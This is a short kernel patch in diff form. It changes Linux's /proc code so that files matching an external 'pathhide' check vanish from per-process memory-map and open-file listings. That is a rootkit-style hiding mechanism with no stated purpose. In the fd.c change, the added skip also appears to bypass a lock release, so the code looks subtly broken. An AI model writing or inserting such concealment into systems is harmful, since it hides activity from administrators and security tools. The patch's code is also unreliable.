--- a/fs/proc/task_mmu.c
+++ b/fs/proc/task_mmu.c
@@ -272,6 +272,10 @@
 	unsigned long start, end;
 	dev_t dev = 0;
 	const char *name = NULL;
+	extern bool pathhide_match_file(struct file *file);
+
+	if (file && pathhide_match_file(file))
+		return;
 
 	if (file) {
 		struct inode *inode = file_inode(vma->vm_file);

--- a/fs/proc/fd.c
+++ b/fs/proc/fd.c
@@ -251,6 +251,7 @@
 {
 	struct task_struct *p = get_proc_task(file_inode(file));
 	unsigned int fd;
+	extern bool pathhide_match_file(struct file *file);
 
 	if (!p)
 		return -ENOENT;
@@ -270,6 +271,8 @@
 		if (!f)
 			break;
 		data.mode = f->f_mode;
+		if (pathhide_match_file(f))
+			continue;
 		rcu_read_unlock();
 		data.fd = fd;
 
